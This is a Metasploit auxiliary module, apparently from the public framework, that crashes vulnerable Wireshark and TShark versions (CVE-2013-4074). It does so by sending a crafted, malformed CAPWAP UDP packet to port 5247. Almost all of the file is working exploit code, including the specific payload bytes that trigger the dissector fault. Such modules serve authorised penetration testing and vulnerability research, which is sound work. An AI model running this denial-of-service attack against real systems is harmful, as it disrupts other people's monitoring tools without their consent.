1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Wireshark CAPWAP Dissector DoS',
15
        'Description' => %q{
16
          This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well
17
          as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a
18
          packet correctly when an incorrect length is given.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          'Laurent Butti', # Discovery vulnerability
23
          'j0sm1' # Auxiliary msf module
24
        ],
25
        'References' => [
26
          ['CVE', '2013-4074'],
27
          ['OSVDB', '94091'],
28
          ['BID', '60500']
29
        ],
30
        'DisclosureDate' => '2014-04-28',
31
        'Notes' => {
32
          'Stability' => [CRASH_SERVICE_DOWN],
33
          'SideEffects' => [],
34
          'Reliability' => []
35
        }
36
      )
37
    )
38

39
    # Protocol capwap needs port 5247 to trigger the dissector in wireshark
40
    register_options([ Opt::RPORT(5247) ])
41
  end
42

43
  def run
44
    connect_udp
45

46
    # We send a packet incomplete to crash dissector
47
    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
48
    # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
49
    # the dissector crash
50
    # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt
51
    # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000
52
    buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15)
53
    udp_sock.put(buf)
54

55
    disconnect_udp
56
  end
57
end
58

59